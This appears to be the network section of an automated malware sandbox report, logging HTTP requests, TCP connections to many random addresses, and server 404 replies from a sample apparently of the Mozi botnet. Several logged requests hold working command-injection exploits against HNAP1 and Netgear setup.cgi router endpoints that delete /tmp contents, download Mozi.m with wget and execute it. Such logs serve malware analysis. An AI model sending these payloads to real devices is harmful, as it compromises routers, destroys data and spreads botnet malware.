Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 221.128.175.114:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.54.104.1:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 175.119.69.229:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</I
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 112.74.206.52:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 5.89.214.135
Source: unknown	TCP traffic detected without corresponding DNS query: 149.185.53.154
Source: unknown	TCP traffic detected without corresponding DNS query: 155.61.123.253
Source: unknown	TCP traffic detected without corresponding DNS query: 184.217.35.73
Source: unknown	TCP traffic detected without corresponding DNS query: 105.137.202.218
Source: unknown	TCP traffic detected without corresponding DNS query: 99.37.65.129
Source: unknown	TCP traffic detected without corresponding DNS query: 175.141.183.193
Source: unknown	TCP traffic detected without corresponding DNS query: 84.60.151.77
Source: unknown	TCP traffic detected without corresponding DNS query: 132.169.224.240
Source: unknown	TCP traffic detected without corresponding DNS query: 207.49.85.172
Source: unknown	TCP traffic detected without corresponding DNS query: 101.215.138.244
Source: unknown	TCP traffic detected without corresponding DNS query: 146.159.89.38
Source: unknown	TCP traffic detected without corresponding DNS query: 141.139.161.123
Source: unknown	TCP traffic detected without corresponding DNS query: 217.128.81.132
Source: unknown	TCP traffic detected without corresponding DNS query: 102.211.48.37
Source: unknown	TCP traffic detected without corresponding DNS query: 190.180.20.21
Source: unknown	TCP traffic detected without corresponding DNS query: 97.152.141.58
Source: unknown	TCP traffic detected without corresponding DNS query: 132.35.122.63
Source: unknown	TCP traffic detected without corresponding DNS query: 206.66.211.183
Source: unknown	TCP traffic detected without corresponding DNS query: 41.22.25.103
Source: unknown	TCP traffic detected without corresponding DNS query: 5.69.78.55
Source: unknown	TCP traffic detected without corresponding DNS query: 79.186.143.177
Source: unknown	TCP traffic detected without corresponding DNS query: 109.147.241.154
Source: unknown	TCP traffic detected without corresponding DNS query: 138.58.82.192
Source: unknown	TCP traffic detected without corresponding DNS query: 50.41.174.31
Source: unknown	TCP traffic detected without corresponding DNS query: 205.51.46.8
Source: unknown	TCP traffic detected without corresponding DNS query: 17.143.195.16
Source: unknown	TCP traffic detected without corresponding DNS query: 70.97.76.208
Source: unknown	TCP traffic detected without corresponding DNS query: 85.233.216.179
Source: unknown	TCP traffic detected without corresponding DNS query: 193.176.243.123
Source: unknown	TCP traffic detected without corresponding DNS query: 209.136.182.147
Source: unknown	TCP traffic detected without corresponding DNS query: 59.17.48.95
Source: unknown	TCP traffic detected without corresponding DNS query: 176.127.83.100
Source: unknown	TCP traffic detected without corresponding DNS query: 52.176.185.219
Source: unknown	TCP traffic detected without corresponding DNS query: 163.49.20.154
Source: unknown	TCP traffic detected without corresponding DNS query: 34.144.108.84
Source: unknown	TCP traffic detected without corresponding DNS query: 180.191.141.165
Source: unknown	TCP traffic detected without corresponding DNS query: 133.183.45.107
Source: unknown	TCP traffic detected without corresponding DNS query: 217.32.46.116
Source: unknown	TCP traffic detected without corresponding DNS query: 43.163.194.108
Source: unknown	TCP traffic detected without corresponding DNS query: 55.92.128.187
Source: unknown	TCP traffic detected without corresponding DNS query: 221.38.227.70
Source: unknown	TCP traffic detected without corresponding DNS query: 73.227.59.34
Source: unknown	TCP traffic detected without corresponding DNS query: 1.86.24.162
Source: unknown	TCP traffic detected without corresponding DNS query: 117.145.177.145
Source: unknown	TCP traffic detected without corresponding DNS query: 132.134.9.26
Source: unknown	TCP traffic detected without corresponding DNS query: 124.193.58.88
Source: unknown	TCP traffic detected without corresponding DNS query: 166.131.20.168
Source: unknown	TCP traffic detected without corresponding DNS query: 7.175.103.180
Source: unknown	TCP traffic detected without corresponding DNS query: 207.100.187.60

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:45:14 GMTServer: Apache/2.4.51 (cPanel) OpenSSL/1.1.1l mod_bwlimited/1.4Content-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-storeContent-Type: text/html; charset=utf-8Via: 1.1 spaces-router (e3eb0c1553be)Date: Tue, 16 Nov 2021 14:46:52 GMTContent-Length: 549Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 75 63 68 20 61 70 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 2f 2f 77 77 77 2e 68 65 72 6f 6b 75 63 64 6e 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6e 6f 2d 73 75 63 68 2d 61 70 70 2e 68 74 6d 6c 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="utf-8"> <title>No such app</title> <style media="screen"> html,body,iframe { margin: 0; padding: 0; } html,body { height: 100%; overflow: hidden; } iframe { width: 100%; height: 100%; border: 0; } </style> </head> <body> <iframe src="//www.herokucdn.com/error-pages/no-such-app.html"></iframe> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Nov 2021 14:46:58 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 207Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 65 74 75 70 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 16 Nov 2021 14:47:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 